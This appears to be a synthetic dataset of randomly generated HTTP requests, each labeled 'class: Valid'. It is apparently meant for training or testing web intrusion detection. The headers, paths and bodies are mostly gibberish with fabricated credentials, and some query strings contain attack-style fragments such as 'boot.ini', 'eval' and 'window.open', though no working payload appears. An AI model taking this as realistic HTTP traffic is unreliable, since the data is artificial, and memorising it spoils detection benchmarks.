Via: 5.9 216.20.13.22
Transfer-Encoding: identity
Upgrade: 7dan1/4.1, egy/8.2, adh/9.9, duh9t/0.3
Warning: 983 109.244.195.91 "L7Uqnd6Rnxrtrw" "Mon, 04 Apr 05 04:37:49 GMT"
X-Serial-Number: 749091
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ca32n0ictoe=dvc96m gpnf~j~s il&poahw7sihhfejm=)   (   |(net=tow*)&nttpidoLheItm0p=51&ybuivtrps26c=051&btoee8zre=48562

End - Id: 37546
Start - Id: 29854
class: Valid
GET /rcex2uste/t2td5ltdal/aN92e2ayj.js?esLhom6afns8=20&1gi=5230&oehetcev=eCP-&dta=ivirt2dlttomfhh&5ynIinG1=4 HTTP/1.1
Host: 103.12.205.213
Connection: wxualoa
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: gzip;q=0.9
Accept-Language: peoeiea-el, tpl-tyjehu, Nbvrbmq-eusmbnwt;q=0.1, hoha-nbdTt
Cache-Control: no-store
Client-ip: 79.194.70.87
Cookie: rceftehihof=oeaeeo;dpraier=2385
Cookie2: $Version="3"
Date: Tue, 26 May 09 03:12:36 CET
ETag: W/"Wb958tQQhaImEh@XAw"
Expect: alearlon=piajsq;a7ave=eihf4
From: hggtsom6@ieylr.uk
If-Modified-Since: Wed, 31 Dec 08 16:18:58 GMT
If-Unmodified-Since: Sun, 08 Apr 07 23:43:44 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 30 Dec 09 08:56:46 CET
Max-Forwards: 243
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: ooCrn uhdtoip=x2totge
Authorization: NTLM SWRhc21waWRlaHNoZWU5dG9lZ28zb250NzFpbjdvcmVyaWlsVGQ=
Range: -58988,5-,282881-
Referer: /otug/toktohm/ooAs.jpg
TE: gzip
Trailer: Expect
User-Agent: Mozilla/7.0 (Windows; U; Windows NT 8.4; ya-t7; rv:5.5.1) Gecko/46493638
UA-CPU: MIPS
UA-Disp: 724,467,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 952x914
Via: 5.8 www.idNNaew.js, naeo/4.0 www.rmbnttNp.jpg, 7.6 206.253.182.195
Transfer-Encoding: mckka
Upgrade: eiseh/5.9
Warning: 092 51.28.246.106:00061 "nleog" "Sat, 22 Dec 07 18:20:58 UTC"
X-Forwarded-For: 123.112.15.19
X-Serial-Number: 82258082988548
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29854
Start - Id: 2008
class: Valid
GET /ewSaFkSH0vQ/hswncay3mgXde3bcnsr/d1naiGttxtbtrre7eTiE/dYg43NO@JbMMW5R/nLVIMq0/2xneKee/TtisnlSitbiceoodil/asm0spaw3uy/XQcmailJdJxs%uXI5/dtsdi2edntipaaratr/gsaetsEyUmesLNe.mspx?slnqjirnouitiem=17091&fnsfaejsatetYl=eqel9LObra&lnjRg=eetv+peictrc3se&vbscriptCg49s=6968584&hrnhimanstdnat=Yx&ELqsX=88&uoerNgbitstht=fihlaUczsts&2chkehea=1&aelfe=elni HTTP/1.0
Host: www.t02wt1eht.com
Connection: close
Accept: */*
Accept-Charset: iso-8859-1;q=0.6, big5;q=0.8
Accept-Encoding: compress
Accept-Language: er-ffhdH;q=0.0
Cache-Control: max-age=26523
Client-ip: 30.211.1.172
Cookie: e8dtlnPnRd=ouitv;wAu=nkjyC@m3i;suepbaoi9ohotb=1959220
Cookie2: $Version="867"
Date: Wed, 18 Aug 04 05:31:00 GMT
ETag: W/"B@X6mQUMS2BRlAFjR"
Expect: 9Toz
From: tlvajp@oiboillauo.de
If-Modified-Since: Wed, 17 Mar 04 21:22:16 UTC
If-Unmodified-Since: Wed, 24 Mar 10 14:34:59 UTC
If-Match: *
If-None-Match: "hRDPa0@TcqMHfO4r"
If-Range: *
Max-Forwards: 8653
MIME-Version: 6.3
Pragma: ed=dnaei
Proxy-Authorization: NTLM b2VpZk9zcG54dGVldG91czgzaW9vaWVkRmRocjF0Ym4=
Authorization: NTLM b2h0ZWFpdEdkczRvaWkwaXpvZWVLakxaYlRhaHJnaHRuZWVp
Range: -92007,597-,975-
Referer: http://hndns.com/d2a0/sedao5.mpg
TE: trailers,gzip
Trailer: Upgrade
User-Agent: Mozilla/5.1 (Windows; U; WinNT 3.4; oc-ag; rv:9.5.2) Gecko/57799569
UA-CPU: PowerPC
UA-Disp: 5129,6449,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 396x457
Via: 2.3 244.172.94.164
Transfer-Encoding: 2assd; kagneiia=hrtH
Upgrade: een/2.2
Warning: 846 www.tstit.gif:25 "i2el2i" "Sat, 15 Apr 06 23:55:01 UTC"
X-Forwarded-For: 223.58.98.228
X-Serial-Number: 1442191022000
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2008
Start - Id: 9403
class: Valid
GET /cMC-.y8YT/etrlwnaraa/Fylutol27rdcaewxrB/xgchifktnrtets6zu2/gEL_F7hk28N/6aAAufsjr.js?9scriptZj=rysnnsdrop0as%29im+o+A HTTP/1.0
Host: 160.202.202.200:258
Connection: Oijeqia
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: deflate
Accept-Language: 6-aros
Cache-Control: seh='iDtrlZn'
Client-ip: 92.24.119.207
Cookie: t2ekte=rxz8MJ;HsneleecletrCaE=d-arctn1r)nrhe7ae s3;tnasigh8eN=2055166524;1hsslua=29639;f7XDIDeD=iieb3rirumn9asi3t
Cookie2: $Version="524"
Date: Mon, 05 Nov 07 20:46:35 CET
ETag: "rL6DyzDqGZ.Tym0P"
Expect: 100-continue
From: yapns@3eeRle.cz
If-Modified-Since: Tue, 12 Apr 05 01:47:43 GMT
If-Unmodified-Since: Sun, 19 Sep 04 20:44:41 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 01
MIME-Version: 6.5
Pragma: t='icd5e4'
Proxy-Authorization: OdcSix ayHxs=easseTwo
Authorization: Digest username="eesex5t"
Range: -33681
Referer: http://www.i0tnziql.cz/mdshcph.jpg
TE: chunked,chunked;q=0.1
Trailer: Transfer-Encoding
User-Agent: NdTzrntfe (rTrD9@AJK; 8tU1-tw; nBlroo.8K; gZRATqndm; n56MBsu)
UA-CPU: Sparc
UA-Disp: 849,768,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 9764x9599
Via: FTP/2.7 53.154.9.229
Transfer-Encoding: deflate
Upgrade: n1s/5.5, lmwiso/3.8, Tal9/6.5, E6Ia/4.3
Warning: 337 83.238.5.69 "erpbowppr" "Thu, 29 Sep 05 23:26:00 CET"
X-Forwarded-For: 89.84.41.1
X-Serial-Number: 65848715378988
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9403
Start - Id: 24570
class: Valid
GET /wgetIrmSQgRit.jpeg?b5m=%25tns&heel=85&1aQPlsq=%3A&CYservicesMH=31381580&nIs=ei%26+ HTTP/1.1
Host: www.ll5stsdanl.com
Connection: iLrwdlnt
Accept: */*;q=0.4
Accept-Charset: iso-8859-4;q=0.8, iso-8859-8, windows-1258;q=0.0, euc-cn
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 117.236.96.225
Cookie: iran2mo6ioew1dK=ln;eeaeaeuep78wh=t6@k;aCeteugtdlb=5947;ocuanehiw=l ;na=Ttc
Cookie2: $Version="30"
Date: Tue, 25 Oct 05 13:17:02 CET
ETag: "@Plzjxc3.hc4@8UrD"
Expect: 100-continue
From: eCraxq8@s81s.com
If-Modified-Since: Tue, 12 Jun 07 14:58:34 CET
If-Unmodified-Since: Thu, 04 Jan 07 10:42:12 CET
If-Match: "un.Zz5dEKbRqDkjBJYW"
If-None-Match: *
If-Range: Mon, 19 Apr 10 07:52:29 GMT
Max-Forwards: 3385
MIME-Version: 0.0
Pragma: ot=btn
Proxy-Authorization: NTLM c2FNbnhPb3M4b2FocmhOaGloY2FhdHRvclRjZWp1WGlOenRpZWNuYmVlZW4=
Authorization: NTLM cmxqVGpsZXZlbW90eTZjeG5UODNOdGVjaGVvb2FwMm1yb2FrdW81Tw==
Range: 4851-94
Referer: /oifise/or3u/bTctsehi.wmn
TE: trailers,deflate;q=0.9,chunked
Trailer: Range
User-Agent: Mozilla/8.6 (Windows; U; Win 9x 6.3; i8-5i; rv:7.1.2) Gecko/41119954
UA-CPU: StrongARM
UA-Disp: 6381,2438,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 419x657
Via: 0.8 www.lFii.gif, FTP/9.6 www.ehlidh.png:6
Transfer-Encoding: ameeh; tnY76wk=z9Aot8
Upgrade: 5Rus/0.8, ttkTi/7.1, ai2/0.9
Warning: 626 www.dt4tel.gif "meir" "Tue, 26 Jul 05 08:33:29 GMT"
X-Forwarded-For: 181.137.254.3
X-Serial-Number: 185732331097779
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24570
Start - Id: 12173
class: Valid
GET /nUeTu-qAj.A/ix/es/0Y-ysTm0CK3IdczLSf6B/sJHKw@UZsi/iLlRWYjJt-gXGPFGxcjb/Ehtpotgryemgaao/gY/xVFJIAg9Z11xfj1w.asp?bpgldmop=s&ruuB=etfiiueamtT&ettidphboy=aqh%3E HTTP/1.0
Host: www.tlbkob.it:773
Connection: htrs
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 42.157.138.178
Cookie: slRptmaCs=jea;ue56exec3GZ=sxebeoolfEi32dtrlo
Cookie2: $Version="3"
Date: Sat, 25 Feb 06 15:02:57 CET
ETag: "vP5WyXiK_Ogb6z9m@"
Expect: 100-continue
From: eeotsLel@forahartri.net
If-Modified-Since: Mon, 06 Dec 04 18:50:49 UTC
If-Unmodified-Since: Thu, 24 Jun 04 14:30:27 CET
If-Match: "uIxL4Xa2dUpHFsBnQaD"
If-None-Match: "dj8WNjKLWFoUm8iCXwpY"
If-Range: Sun, 29 Mar 09 11:42:55 CET
Max-Forwards: 0217
MIME-Version: 1.4
Pragma: ledortao=i07
Proxy-Authorization: lert mmeei=fdhn
Authorization: syualn atb5Dae=akwes
Range: -6
Referer: http://www.qceeLin.be/ingEa/hAelsy1e/eaiofOeb/rlkaesiw/rn4hni.css
TE: trailers
Trailer: Via
User-Agent: daeytbiemzhshtn
UA-CPU: 68000
UA-Disp: 908,936,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 161x2699
Via: 1osr4t/7.6 5.81.156.130
Transfer-Encoding: compress
Upgrade: baheen/8.2, os6u/6.0, sloeee/4.4
Warning: 799 56.216.155.145 "xcmStingtiLaa" 
X-Forwarded-For: 215.199.241.153
X-Serial-Number: 99725023233624761
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12173
Start - Id: 29114
class: Valid
GET /nheETqceupenibla/ik3NSES/nfckiibrbs8ehlaaoa/3orWLuwindow.openy8jpt0QTw/zaSa/ayX/hy6SxNDhDp7MgG/eo/rAei.js? HTTP/1.0
Host: www.eann1fhe.it:3990
Connection: close
Accept: */*
Accept-Charset: x-mac-chinesesimp;q=0.9, isiri-3342;q=0.4, koi8, iso-8859-9;q=0.9, isiri-3342;q=0.9
Accept-Encoding: 
Accept-Language: jelara-mhUuhte;q=0.3, l-xil, bhsle0ul-tsgvobvt;q=0.8, Sat6Teo-R;q=0.5
Cache-Control: max-stale
Client-ip: 238.223.12.222
Cookie: lihaeKs=42;oeu5hlyhtNdnoe=ieu;eOtTsicmD=7;ohesafhhi4=oksmetast0swgett2;0iolSseeeho=3182107128;osrffno=rtoEnmoyy97gei
Cookie2: $Version="6"
Date: Sun, 04 Jun 06 19:49:02 GMT
ETag: W/"Tzt441O3pdWReDMCcLJa"
Expect: 100-continue
From: e1ae@Pieni5s0wn.cz
If-Modified-Since: Sun, 07 Mar 04 11:49:58 GMT
If-Unmodified-Since: Sun, 30 Nov 08 02:24:01 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 58
MIME-Version: 2.3
Pragma: dciop='ettae'
Proxy-Authorization: NTLM cmVvbGxhZXN1bGVsQWRsZXVzdG9pczk1aHJzbHdyYTlzbmV0bTZl
Authorization: Basic bk4wZW04ZjY6YXNlZW96bg==
Range: 71-
Referer: /YiAsaoir/g5N4r/Rcpastw.shtml
TE: deflate,trailers,chunked
Trailer: TE
User-Agent: Mozilla/1.0 (Windows; U; WinNT 7.2; s4-Gm; rv:1.8.0) Gecko/85110295
UA-CPU: x86
UA-Disp: 8585,7282,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 325x832
Via: zmtt/6.6 www.axoNhm.png:40, HTTP/9.4 www.unftt.png, 2.1 www.onnn.htm:02
Transfer-Encoding: gzip
Upgrade: rotr/8.6, 0vwd/6.0, 7ye/1.1, etnead/3.9, 7aate3/3.4
Warning: 711 www.heqs.tiff "w6anEbhagmiefnfsan" 
X-Forwarded-For: 244.82.254.221
X-Serial-Number: 1881707
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29114
Start - Id: 24545
class: Valid
GET /cxqoot6uegwh1vo/1tnoUtte/mV/Aneo2reGi/8Thtacces@/m2uaf8OlvXiwDeu6iZ/vS/iNthleoocazotxme/eryx/d.u2wZ/iDooktzton.gif?Ioor3xrs=G%3Bs&MBMA=911831805&ajbel=78&soaeiedjcPh=u71hN&oIinreaidoorsh=tcYXb7&eIntafexw35h=85724325&Mlikemp-G=8lmailM+&t2=346800&6edtedhtwer=tseOrpRttaee1ienl&aaie=suUao4cenwlmegon HTTP/1.0
Host: www.hnya.com
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: shift_jis, iso-8859-9;q=0.0, cp-936, utf-8, koi8-r
Accept-Encoding: compress
Accept-Language: *;q=0.6
Cache-Control: max-age=76771
Client-ip: 214.196.246.18
Cookie: hfnn=22;roi=265166
Cookie2: $Version="2"
Date: Wed, 07 Oct 09 11:41:26 GMT
ETag: "x1n0fyS6m54WqR@i_K0z"
Expect: r7ndcs
From: 1ulNhsn@sSweeqd.gov
If-Modified-Since: Tue, 19 Apr 05 12:24:26 UTC
If-Unmodified-Since: Sat, 16 Dec 06 13:28:25 UTC
If-Match: *
If-None-Match: "VivOGIK099Me.9CR4U"
If-Range: Thu, 28 Dec 06 13:28:44 UTC
Max-Forwards: 409
MIME-Version: 1.2
Pragma: ceyark=g
Proxy-Authorization: oyTb n3auus1d=esdje3nn
Authorization: NTLM aXN0ZGllWXBpZWhjbGxvaXh4bmR4dGVlcnRkZWhoYTNuZWI4TWVyc3Qxcmhz
Range: -001651,-8
Referer: http://www.7OEuo0.fr/s1irMt/rahf.mdb
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/3.7 (X11; U; Unix 9.0; ua-zs; rv:5.3.7) Gecko/88673027
UA-CPU: Sparc
UA-Disp: 6381,2438,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 303x667
Via: 8.5 152.63.60.52:7992
Transfer-Encoding: identity
Upgrade: tfDtgt/3.8, s7e/0.3
Warning: 900 74.109.202.46:6 "oanoeaj2nll" "Sat, 13 Jan 07 24:32:28 GMT"
X-Forwarded-For: 181.137.254.3
X-Serial-Number: 185732331097779
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 24545
Start - Id: 34666
class: Valid
POST /documentqEsN/n7sepastc/i_8L@6EwS_/lRGzPv-.R/U4t1u9XbE/XhtaccesZm_jBSrAkH/tMQ/zA0s@4Fbbw/2metapkOfUm/kafhK@Qgw/AALairsu/inbotseaeGzi.exe? HTTP/1.0
Content-Length: 103
Content-Language: 0ftil0o,aBii7,e
Content-Encoding: identity
Content-Location: http://lhetntib.biz/xehsr/nhpeothI.mdb
Content-MD5: bWlvOG5laWxiZnNucnNTRQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 30 Dec 08 12:03:43 CET
Last-Modified: Sun, 18 Nov 07 14:10:55 CET
Host: www.esiioeehj.net
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: utf-8, windows-1254, iso-2022-kr, euc-jp;q=0.6
Accept-Encoding: deflate;q=0.7
Accept-Language: en-tden;q=0.6, i-gersyn;q=0.0, ercstl-jK;q=0.9, d-oa;q=0.1
Cache-Control: no-store
Client-ip: 120.36.171.34
Cookie: enar=7217628;herlshvsnr=yntde
Cookie2: $Version="20"
Date: Wed, 21 Apr 10 01:06:53 GMT
ETag: "Rs9TN4rmE48OBvdEuO88"
Expect: tTsresbs
From: ollao@ehcaufe.uk
If-Modified-Since: Thu, 09 Jun 05 17:20:15 UTC
If-Unmodified-Since: Thu, 19 Jul 07 14:07:52 UTC
If-Match: "@P@qWYOs-NVfsp_gTyh"
If-None-Match: *
If-Range: "0lhO0lKA7VotYzAt"
Max-Forwards: 470
MIME-Version: 8.8
Pragma: an='uj9o'
Proxy-Authorization: Digest response="41b538e6f0bdCAb1964e2d58319d8cFC"
Authorization: NTLM bjVkeGhhYWFsaWdhc0NkZXRybnRlNXVpQTJhbVRpc3RhMWpyTm5jaXRy
Range: 6731-788,3496-,826-
Referer: http://www.ltTs.uk/etbc/67tnjt/uTdh0hit.asp
TE: trailers,gzip;q=0.9,deflate
Trailer: Connection
User-Agent: rbd0Fhko (0q7vEW-; ixTSvGC; v_zk11T7S; uq1IUI)
UA-CPU: PowerPC
UA-Disp: 888,756,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 0894x8053
Via: 7.7 60.230.63.110:6, HTTP/7.3 www.TSjlTisu.tiff
Transfer-Encoding: identity
Upgrade: Pxo/5.2, ieHso/7.8
Warning: 119 185.151.217.148 "eeihh" "Wed, 04 Feb 09 09:01:27 GMT"
X-Forwarded-For: 180.150.65.176
X-Serial-Number: 80315
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

QYservicesEZbhNV2tmp8=9532369&mmjFdiv3node54_6lib=atQ&pETzm=08&rwAo6o=Almcotel&hLah=oo1&zirs=rlS-uP6JWQ

End - Id: 34666
Start - Id: 16119
class: Valid
GET /1efm/eenyla.html?G4hj55e2ps=ts43eqo&susera=3407220&s8vemhvh=Ai&cahrg0kneqd=sNwmL&uVvbscriptMboot.iniAcMNs=t&llloicixMsd=sege7nrbkqc&ljno=window.openexeca&gugbSleh=iidie%3Fos%3Ey&a0yeencM=s1hl%40L&qEaltaomNfe=67554&qzaar8tkt=8845&ls8nereow=ohoit9Unirha4gLn1 HTTP/1.0
Host: 34.208.210.75:21
Connection: daatfam
Accept: audio/basic;q=0.3, video/*;q=0.2
Accept-Charset: *
Accept-Encoding: deflate;q=0.6, compress;q=0.3, compress;q=0.8
Accept-Language: dqattnoC-fnnu
Cache-Control: min-fresh=8461
Client-ip: 204.40.193.158
Cookie: cpsdh5Ngtnc=8gst;bJ5C5=86911;xmnU5s8ath=73htna f
Cookie2: $Version="7"
Date: Tue, 25 Jan 05 02:26:25 UTC
ETag: "lZl2xD8-_161cHGwhb"
Expect: 100-continue
From: c2a1pa@8itiJl.de
If-Modified-Since: Sat, 08 May 04 20:02:29 CET
If-Unmodified-Since: Sat, 08 Jan 05 17:26:49 GMT
If-Match: "EMjGf1rwmXZCPopS"
If-None-Match: "km201qEctfLtT8b"
If-Range: *
Max-Forwards: 26
MIME-Version: 2.7
Pragma: fcn1a4p='a'
Proxy-Authorization: Digest uri=/ttihrsz/Tptn/rLV8/veluwm.js
Authorization: NTLM bm55aG11bzZzdGxuT3c4ODJzcGFlMnZPc2FzdDR0NHQ5N3JzdHRw
Range: -45,626-,-2
Referer: /eEer/iaedt6se/redvairi/aNesA3a.png
TE: deflate,gzip
Trailer: Connection
User-Agent: eiilorjaDr
UA-CPU: MIPS
UA-Disp: 235,1889,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 4140x4561
Via: 3u7eai/7.4 www.atbt.jpeg
Transfer-Encoding: compress
Upgrade: ro1tlo/3.6, tuh/6.6
Warning: 964 221.114.71.110:2492 "9tmf4asphah" 
X-Forwarded-For: 45.149.45.168
X-Serial-Number: 6495346475
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16119
Start - Id: 19494
class: Valid
GET /9pex.9Vpbf.pl?gotrwIRmeprn=4058186 HTTP/1.1
Host: www.fcl2sm.uk
Connection: close
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: *
Accept-Language: d-eieRSnGd, t6see-a;q=0.2, il-inee;q=0.7
Cache-Control: no-store
Client-ip: 221.151.112.102
Cookie: etihchwrr=n<tiw 9drophvx
Cookie2: $Version="54"
Date: Tue, 23 Nov 04 14:41:24 UTC
ETag: W/"gQfMlcTr0-Xv2dG"
Expect: Ota8itr=37su6o;yrhfelu=lEih
From: oeonm@ce9paig.cz
If-Modified-Since: Sun, 23 Sep 07 01:11:59 UTC
If-Unmodified-Since: Wed, 09 Aug 06 11:50:46 CET
If-Match: "a9oruW2XYTflIpgZAV"
If-None-Match: *
If-Range: Sat, 29 Oct 05 12:57:13 UTC
Max-Forwards: 80
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.3p3m.de/49ldleap/eaosgltI/jsAreodj/5amiaon.bin
Authorization: dyoh arnnm=ristiW2z
Range: -39876,97552-
Referer: /twevtRe/iaOs0orT/TYteme/tuotrpo.asmx
TE: trailers,deflate,deflate
Trailer: Accept-Encoding
User-Agent: Mozilla/6.4 (X11; U; Linux i586 7.8; sn-en; rv:6.1.1) Gecko/66609351
UA-CPU: StrongARM
UA-Disp: 190,715,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 570x2839
Via: 5.6 www.eog5u.htm, FTP/2.7 www.caieseb.jpeg, HTTP/4.3 158.249.151.37
Transfer-Encoding: identity
Upgrade: bpjc/2.9, garUt/9.6, exo/6.6
Warning: 200 www.edye.shtml "udeeoogE9s7" "Mon, 18 May 09 13:56:42 CET"
X-Forwarded-For: 229.29.101.243
X-Serial-Number: 7307968388590
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19494
Start - Id: 29712
class: Valid
GET /ey6sUadmintBN/kCrKPGKcDFoE/hu4StA7seted/nXsHIVD@/ac9Tl/_EsDcmd9@wh/mrmabe5e6.tiff?gaeekwwzhteha=3954581&MirOyly3stte=1e%5Czatlu%7Esebtfe9e%7Cd+&l4=2727&Obnfoele3eoa=t9ivo53LQ-vX&-c1ck@9.k=9&eslkI4=eR-Dg&BehcH=44988&psss=tnbH%2Ftaf6Re+&mr=849705694&dNhlsy=13&csiDT=dnulloel&Zn7VWk5jKKTeval=tlldAhr6isIb&ssIh6ehuraiedf=my0ktgk.5ik0&l0M0JgwzChtaccesov=564&maeicicdpe=lig HTTP/1.1
Host: 172.82.174.168
Connection: keep-alive
Accept: image/gif;q=0.8, application/*;q=0.1, video/quicktime;q=0.2
Accept-Charset: *
Accept-Encoding: gzip;q=0.7
Accept-Language: *
Cache-Control: 9heg=hhqtU
Client-ip: 39.47.126.79
Cookie: setr=3856893;ndelete0-eJomhC=rYRZmjMLzP;nybd7ehri=aNIaeveie0h;uUZM=jPX6O;aEPu=okE@7I9okgHA
Cookie2: $Version="8"
Date: Sat, 25 Jul 09 22:16:24 CET
ETag: "NEwHaTOdre.p@rCq"
Expect: zojseoE=aet1tis;9eih
From: nonai@Twda.it
If-Modified-Since: Sat, 05 Dec 09 12:24:30 GMT
If-Unmodified-Since: Mon, 27 Feb 06 18:24:36 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9179
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Basic d2NpZnRyeTpvdFVnZWxocw==
Authorization: NTLM bGNkZUhvdG5yOGtxb2VpOHRvdGRlOHZjdHdyaHYzbm1haW50b2VvZWVlTnVCZnA=
Range: 3472-92,-3524
Referer: /ewiueju/ec6r.aspx
TE: trailers,trailers
Trailer: Date
User-Agent: Mozilla/3.1 (compatible; Konqueror/3.7; Open BSD i586; upcml; faDdlky)
UA-CPU: MIPS
UA-Disp: 0925,6962,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 502x1724
Via: 2.4 www.d3sse.js, 6.7 www.pdoo.shtml, 8.5 www.rraltg.shtml
Transfer-Encoding: identity
Upgrade: mOze/0.8, daji/4.9, odn/5.9
Warning: 839 www.Adlc.css "l0hFhseecnn" 
X-Forwarded-For: 240.221.237.220
X-Serial-Number: 2911766071168
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29712
Start - Id: 8909
class: Valid
GET /lhOl6/sEN-6cmi5Lpq-LZHi/laqypetoxus5NDH/er/ieinaeTeeoR.html? HTTP/1.1
Host: 209.12.32.7
Connection: cTotscne
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 178.118.114.226
Cookie: enoiuaS=evalo6y;kiepudloeees=427
Cookie2: $Version="266"
Date: Tue, 17 Mar 09 08:10:14 UTC
ETag: "o_YERB0dpVOt2YXC"
Expect: 100-continue
From: gyture4e@b1eUnPsa.de
If-Modified-Since: Sat, 13 Aug 05 08:10:37 CET
If-Unmodified-Since: Mon, 26 Sep 05 13:50:11 UTC
If-Match: "V_ZpS2be1Ns6TmB5x"
If-None-Match: "J41NEoiNYYC_GZ7b"
If-Range: Sun, 14 Jan 07 15:00:50 GMT
Max-Forwards: 4
MIME-Version: 7.9
Pragma: u5stz=rmr
Proxy-Authorization: NTLM ZGVuZDRtZ2hyY3Jub29ld3RhZWZoZnBrc0E5T2NNZWVtcGlheGdIbEllUm1la2Rn
Authorization: Digest uri=/ncls.exe
Range: 7-3572
Referer: http://www.ttoD.org/ext3H66e/pbEnldeS/xyYeh0e/Odtp/didaa.mpg
TE: chunked;q=0.4,trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/1.2 (compatible; ktwi; Windows NT; it4toqOEt; zmiarn1h; enWr1mopWt)
UA-CPU: 68000
UA-Disp: 0013,2621,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 000x5970
Via: HTTP/8.3 145.159.52.95
Transfer-Encoding: deflate
Upgrade: oaefte/2.4
Warning: 052 65.130.149.140 "iFomeu7jcadiest" 
X-Forwarded-For: 219.111.245.62
X-Serial-Number: 266699
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 8909
Start - Id: 4320
class: Valid
PUT /oiqdpru/9Y.gL3CGH19lGZ5uGoJ/eecrohls/DNyqmgTjCs/DxERrVevalUo/e9XRId1Y61yRTBh/tN/eo/jNzDmga1/9opiicSR4asFgc/zobeyEllng.bin? HTTP/1.1
Content-Length: 178
Content-Language: tisYht,etned,o
Content-Encoding: compress
Content-Location: http://www.haeear.cz/soedtw/eweftc8t/j8bWe7ei/ecaectv.cgi
Content-MD5: N2V6RWdkaDNlb3JhZTV0bg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 23 Feb 05 16:06:57 CET
Last-Modified: Sat, 03 Sep 05 17:39:50 CET
Host: 9.182.64.59
Connection: close
Accept: */*
Accept-Charset: iso-8859-1;q=0.7, ks_c_5601-1987, x-mac-icelandic, iso-8859-1;q=0.3, euc-kr;q=0.1
Accept-Encoding: 
Accept-Language: p2-fnmnahl;q=0.7, iieoasd-tw;q=0.4
Cache-Control: max-stale
Client-ip: 10.70.26.4
Cookie: LT8eh=tAGB5;oeViEredsoppi=9004
Cookie2: $Version="09"
Date: Sun, 08 Nov 09 24:27:55 GMT
ETag: W/"aIKIdtUE.SkZ8Vjfnq"
Expect: hwiei
From: hniryitt@cesrtata.de
If-Modified-Since: Wed, 01 Nov 06 02:23:30 CET
If-Unmodified-Since: Wed, 25 Apr 07 14:11:19 UTC
If-Match: *
If-None-Match: "H9j0MF5k_I-mPB.ZkDTw"
If-Range: Wed, 07 Apr 10 16:48:35 CET
Max-Forwards: 1177
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest nonce
Range: -6985,-5545,-0
Referer: /ryntyb/usHNr/ndiqehle/fneacmn/dtay.avi
TE: trailers,trailers,chunked
Trailer: From
User-Agent: oaoig7 (cu-t7I28; ak8i5zvn)
UA-CPU: Sparc
UA-Disp: 9274,388,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 8501x1867
Via: 2.7 www.oflghh.css:9121, FTP/8.5 199.12.222.14:3
Transfer-Encoding: gzip
Upgrade: rol/1.1
Warning: 980 www.Rrmnetut.css:6 "sOlpsziur" "Wed, 25 Mar 09 01:43:09 GMT"
X-Forwarded-For: 37.39.29.141
X-Serial-Number: 89404731835
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tumcrdETniasqo=3788021&6ereeRvhduzAasd=neamrq r>p'Jak+t&9OizfK=122621&easewDfue30eir=ezUsC@3&wWUjUdocumentxboot.iniFj=71741&zncheInse=42&slaceisohiEenR=enSg&ihgefi=dereH4

End - Id: 4320
Start - Id: 20253
class: Valid
